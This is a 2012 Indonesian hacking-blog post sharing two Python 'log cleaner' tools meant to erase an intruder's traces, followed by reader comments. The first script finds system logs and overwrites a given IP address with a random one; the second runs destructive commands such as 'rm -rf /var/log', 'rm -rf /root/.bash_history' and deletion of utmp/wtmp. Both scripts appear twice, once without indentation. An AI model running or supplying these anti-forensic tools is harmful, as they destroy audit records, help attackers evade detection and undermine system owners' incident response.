Python Log Cleaner

19 February 2012
Penulis: Artikel · Kategori Artikel: Coding

Greeting BinusHacker Family,

Share code untuk tools pembersih “log” dengan menggunakan phython, manfaatnya adalah anda bisa menghilangkan jejak sejenak dari log yang tersimpan.

Berikut ini codenya:

#!/usr/bin/python
#PyLogcleaner uses the list given (logfiles) containing
# 274 logfiles and uses the linux find 
#cmd to try and locate more logfiles to search
#for an ip address to replace with a random generated
#one. It can also encrypt/d3crypt a 
#logfile and also can watch a logfile for modifications.


import os, sys, time, pwd, getopt, re, random, StringIO, commands

def title():
    print "\n   PyLogCleaner v1.0"
    print "-----------------------------------------------"

def usage():
    title()
    print "\n  Usage: python logcleaner.py <option>\n"
    print "\t[options]"
    print "\t   -i <ip>: Ip to search for and replace"
    print "\t   -e <file>: Encrypts logfile"
    print "\t   -d <file>: Decrypts logfile"
    print "\t   -w/-watch <file> <time to check> : Watches logfile for modification"
    print "\t   -h/-help: Prints this menu\n"

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

def validater(logs):
    
    activeLogs = []

    print "[+] Validating:",len(logs),"logfiles\n"
    for l in logs:
        if os.path.isfile(l) == True:
            activeLogs.append(l)
    if len(activeLogs)>0:
        print "[+] Active Logs Found:",len(activeLogs)
        return activeLogs
    else:
        print "[-] No Active Logs Found"
        sys.exit(1)
        
def search(logfiles):
    
    print "\n[+] Searching:",ip,"\n"
    import mmap
    
    for file in logfiles:
        try:
            f = open(file, "rb+")
            size = os.path.getsize(file)
            if size >= 1:
                data = mmap.mmap(f.fileno(), size)
                loc = data.find(ip)
                #Lets not search a file with no data.
                if loc == -1:
                    #print "[+] File:",file,"|",size,"bytes"
                    #print "\t[-] IP not found"
                    data.close()
                else:
                    print "-"*45
                    print "[+] File:",file,"|",size,"bytes"
                    print "\t[+] IP found"
                    data.seek(loc)
                    data.write(randip)
                    print "[+] Replaced: ",ip,">>",randip
                    print "[+] New_Size:",os.path.getsize(file),"bytes"
                    print "-"*45
                    data.close()
        except(IOError), msg:
            pass
    print "\n[+] Done:",timer(),"\n"
                    
def findlogs():
    os.chdir("/")
    
    print "[+] Finding More Logfiles..."
    #Lets use the linux find cmd to fing more files containing log...
    logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()
    if len(logz)>0:
        print "[+] Found:",len(logz),"extra logfiles"
        for log in logz:
            if re.search("Permission denied",log) == None:
                logs.append(log[:-1]) 
    return logs
    
def randip():
    
    A = random.randrange(255) + 1
    B = random.randrange(255) + 1
    C = random.randrange(255) + 1
    D = random.randrange(255) + 1
    randip = "%d.%d.%d.%d" % (A,B,C,D)
    return randip

def gettime():
    clock = time.asctime(time.localtime(os.path.getmtime(logfile)))
    return clock

def getsize():
    size = os.path.getsize(logfile)
    return size

def modlast(logfile):
    try: 
        sys.argv[3]
    except(IndexError):
        print "\n[-] Need a time in seconds (ex: 60)\n"
        sys.exit(1)
        
    print "[+] Analyzing:",logfile
    print "[+] Time:",sys.argv[3],"secs"
    print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]
    print "[+] Size:",getsize(),"bytes"
    print "[+] Last Modified:",gettime()
    print "[+] Starting:",timer()

    old_time = gettime()
    while True:
        time.sleep(int(sys.argv[3]))
        new_time = gettime()
        if new_time != old_time:
            print "\n[+] File Modified:",new_time
            print "[+] New Size:",getsize(),"bytes\n"
            old_time = new_time
    
def encrypter(file):
    import base64
    print "\n[+] Encrypting:",file
    print "[+] Size:",os.path.getsize(file),"bytes"
    try:
          log2encode = open(file, "r").read()
    except(IOError): 
          print "Error: Check your full path.\n"
          sys.exit(1)
    log2encode = base64.b64encode(log2encode)
    os.remove(file)
    time.sleep(2)
    f = open(file, "a")
    f.write(log2encode)
    f.close()
    print "[+] NewSize:",os.path.getsize(file),"bytes"
    print "[+] Done\n"

def d3crypter(file):
    import base64
    print "\n[+] Decrypting:",file
    print "[+] Size:",os.path.getsize(file),"bytes"
    try:
          b2log = open(file, "r").read()
    except(IOError): 
          print "Error: Check your full path.\n"
          sys.exit(1)
    b2log = base64.b64decode(b2log)
    os.remove(file)
    time.sleep(2)
    f = open(file, "a")
    f.write(b2log)
    f.close()
    print "[+] NewSize:",os.path.getsize(file),"bytes"
    print "[+] Done\n"

if len(sys.argv) <= 1:
    usage()
    sys.exit(1)
if len(sys.argv) == 2:
    usage()
    sys.exit(1)

if sys.argv[1] == "-w" or sys.argv[1] == "-watch":
    logfile = sys.argv[2]
    if os.path.isfile(logfile) == False:
        title()
        print "\n[-] Cannot Open File, Check Full Path!!!\n"
        sys.exit(1)
    else:
        title()
        modlast(logfile)
if sys.argv[1] == "-i":
    ip = sys.argv[2]        
    try:
          logs = open("logfiles", "r").readlines()
    except(IOError): 
          print "Error: logfiles missing\n"
          sys.exit(1)
    title()
    print "\n[+] Starting:",timer()
    print "[+] Loaded:",len(logs),"logs"
    findlogs()
    randip = randip()
    print "[+] Generate Random IP:",randip
    search(validater(logs))
if sys.argv[1] == "-e":
    file = sys.argv[2]
    title()
    encrypter(file)
if sys.argv[1] == "-d":
    file = sys.argv[2]
    title()
    d3crypter(file)

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

#!/usr/bin/python

#PyLogcleaner uses the list given (logfiles) containing

# 274 logfiles and uses the linux find

#cmd to try and locate more logfiles to search

#for an ip address to replace with a random generated

#one. It can also encrypt/d3crypt a

#logfile and also can watch a logfile for modifications.

import os, sys, time, pwd, getopt, re, random, StringIO, commands

def title():

print "\n PyLogCleaner v1.0"

print "-----------------------------------------------"

def usage():

title()

print "\n Usage: python logcleaner.py <option>\n"

print "\t[options]"

print "\t -i <ip>: Ip to search for and replace"

print "\t -e <file>: Encrypts logfile"

print "\t -d <file>: Decrypts logfile"

print "\t -w/-watch <file> <time to check> : Watches logfile for modification"

print "\t -h/-help: Prints this menu\n"

def timer():

now = time.localtime(time.time())

return time.asctime(now)

def validater(logs):

activeLogs = []

print "[+] Validating:",len(logs),"logfiles\n"

for l in logs:

if os.path.isfile(l) == True:

activeLogs.append(l)

if len(activeLogs)>0:

print "[+] Active Logs Found:",len(activeLogs)

return activeLogs

else:

print "[-] No Active Logs Found"

sys.exit(1)

def search(logfiles):

print "\n[+] Searching:",ip,"\n"

import mmap

for file in logfiles:

try:

f = open(file, "rb+")

size = os.path.getsize(file)

if size >= 1:

data = mmap.mmap(f.fileno(), size)

loc = data.find(ip)

#Lets not search a file with no data.

if loc == -1:

#print "[+] File:",file,"|",size,"bytes"

#print "\t[-] IP not found"

data.close()

else:

print "-"*45

print "[+] File:",file,"|",size,"bytes"

print "\t[+] IP found"

data.seek(loc)

data.write(randip)

print "[+] Replaced: ",ip,">>",randip

print "[+] New_Size:",os.path.getsize(file),"bytes"

print "-"*45

data.close()

except(IOError), msg:

pass

print "\n[+] Done:",timer(),"\n"

def findlogs():

os.chdir("/")

print "[+] Finding More Logfiles..."

#Lets use the linux find cmd to fing more files containing log...

logz = StringIO.StringIO(commands.getstatusoutput('find . -iname *log -perm -444 -print')[1]).readlines()

if len(logz)>0:

print "[+] Found:",len(logz),"extra logfiles"

for log in logz:

if re.search("Permission denied",log) == None:

logs.append(log[:-1])

return logs

def randip():

A = random.randrange(255) + 1

B = random.randrange(255) + 1

C = random.randrange(255) + 1

D = random.randrange(255) + 1

randip = "%d.%d.%d.%d" % (A,B,C,D)

return randip

def gettime():

clock = time.asctime(time.localtime(os.path.getmtime(logfile)))

return clock

def getsize():

size = os.path.getsize(logfile)

return size

def modlast(logfile):

try:

sys.argv[3]

except(IndexError):

print "\n[-] Need a time in seconds (ex: 60)\n"

sys.exit(1)

print "[+] Analyzing:",logfile

print "[+] Time:",sys.argv[3],"secs"

print "[+] Owner:",pwd.getpwuid(os.stat(logfile)[4])[0]

print "[+] Size:",getsize(),"bytes"

print "[+] Last Modified:",gettime()

print "[+] Starting:",timer()

old_time = gettime()

while True:

time.sleep(int(sys.argv[3]))

new_time = gettime()

if new_time != old_time:

print "\n[+] File Modified:",new_time

print "[+] New Size:",getsize(),"bytes\n"

old_time = new_time

def encrypter(file):

import base64

print "\n[+] Encrypting:",file

print "[+] Size:",os.path.getsize(file),"bytes"

try:

log2encode = open(file, "r").read()

except(IOError):

print "Error: Check your full path.\n"

sys.exit(1)

log2encode = base64.b64encode(log2encode)

os.remove(file)

time.sleep(2)

f = open(file, "a")

f.write(log2encode)

f.close()

print "[+] NewSize:",os.path.getsize(file),"bytes"

print "[+] Done\n"

def d3crypter(file):

import base64

print "\n[+] Decrypting:",file

print "[+] Size:",os.path.getsize(file),"bytes"

try:

b2log = open(file, "r").read()

except(IOError):

print "Error: Check your full path.\n"

sys.exit(1)

b2log = base64.b64decode(b2log)

os.remove(file)

time.sleep(2)

f = open(file, "a")

f.write(b2log)

f.close()

print "[+] NewSize:",os.path.getsize(file),"bytes"

print "[+] Done\n"

if len(sys.argv) <= 1:

usage()

sys.exit(1)

if len(sys.argv) == 2:

usage()

sys.exit(1)

if sys.argv[1] == "-w" or sys.argv[1] == "-watch":

logfile = sys.argv[2]

if os.path.isfile(logfile) == False:

title()

print "\n[-] Cannot Open File, Check Full Path!!!\n"

sys.exit(1)

else:

title()

modlast(logfile)

if sys.argv[1] == "-i":

ip = sys.argv[2]

try:

logs = open("logfiles", "r").readlines()

except(IOError):

print "Error: logfiles missing\n"

sys.exit(1)

title()

print "\n[+] Starting:",timer()

print "[+] Loaded:",len(logs),"logs"

findlogs()

randip = randip()

print "[+] Generate Random IP:",randip

search(validater(logs))

if sys.argv[1] == "-e":

file = sys.argv[2]

title()

encrypter(file)

if sys.argv[1] == "-d":

file = sys.argv[2]

title()

d3crypter(file)

Download Tools Disini:

Bisa juga menggunakan tools dari Vodork YCL berikut:

Code:

#!/usr/bin/env python

import threading
import os
from time import sleep, ctime

print'''
  _     _  ___    _
    ( )   ( )(  _`\ ( )
    `\`\_/'/'| ( (_)| |
   `\ /'  | |  _ | |  _
    | |   | (_( )| |_( )
    (_)   (____/'(____/'og cleaner

               Kinds Regard
                        ./VodOrkYCL.py
    '''
lt = ctime()
print '[+] Starting log cleaner at %s\n\n' %(lt)
sleep(5)

class output_command(threading.Thread):
    def __init__(self, command):
        threading.Thread.__init__(self)
        self.command = command
    def run(self):
        os.system(self.command)
        print "[+]log was finish to clean......\n"

class input_command:
    def __init__(self):
                clear_add = ["rm -rf /tmp/logs","rm -rf $HISTFILE","rm -rf /root/.ksh_history","rm -rf /root/.bash_history","rm -rf /root/.bash_logout","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/log","rm -rf /var/apache/logs","rm -rf /var/apache/log","rm -rf /var/run/utmp","rm -rf /var/logs","rm -rf /var/log","rm -rf /var/adm","rm -rf /etc/wtmp","rm -rf /etc/utmp"]
                for listt in clear_add:
                    try:
                      i=output_command(listt)
                      i.start()
                    except:
                      pass

if __name__ == "__main__":
       objCaller = input_command()

#!/usr/bin/env python

import threading

import os

from time import sleep, ctime

print'''

_ _ ___ _

( ) ( )( _`\ ( )

`\`\_/'/'| ( (_)| |

`\ /' | | _ | | _

| | | (_( )| |_( )

(_) (____/'(____/'og cleaner

Kinds Regard

./VodOrkYCL.py

'''

lt = ctime()

print '[+] Starting log cleaner at %s\n\n' %(lt)

sleep(5)

class output_command(threading.Thread):

def __init__(self, command):

threading.Thread.__init__(self)

self.command = command

def run(self):

os.system(self.command)

print "[+]log was finish to clean......\n"

class input_command:

def __init__(self):

clear_add = ["rm -rf /tmp/logs","rm -rf $HISTFILE","rm -rf /root/.ksh_history","rm -rf /root/.bash_history","rm -rf /root/.bash_logout","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/logs","rm -rf /usr/local/apache/log","rm -rf /var/apache/logs","rm -rf /var/apache/log","rm -rf /var/run/utmp","rm -rf /var/logs","rm -rf /var/log","rm -rf /var/adm","rm -rf /etc/wtmp","rm -rf /etc/utmp"]

for listt in clear_add:

try:

i=output_command(listt)

i.start()

except:

pass

if __name__ == "__main__":

objCaller = input_command()

Selamat mencoba, semoga berhasil!

Tags: def, Done, exit 1, family share, file, Import, jejak, Log, logfile, mmap, Path, phython, python, return time, share code, size bytes, StringIO, time, time return, timer

Komentar

6 Komentar Untuk “Python Log Cleaner”
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

ichal pada 19 February 2012 8:06 am
thank gan mau ane coba
reedrocks pada 19 February 2012 8:11 am
makasih om admin.. nice info..
maaf ini buat LINUX ya? ataw bisa buat windows jg?
maaf newbie..
iwonk pada 19 February 2012 12:04 pm
Kereeeenn kk
Rio Tuahta pada 13 April 2012 9:45 am
Kayaknya lebih gampang pake CCleaner ya gk.?
Yusuf Adhi Pranata pada 17 April 2012 8:16 pm
bs dipake wondows ga kk???
fundament0zz pada 21 April 2012 10:12 pm
terima kasih banyak boz,
bermanfaat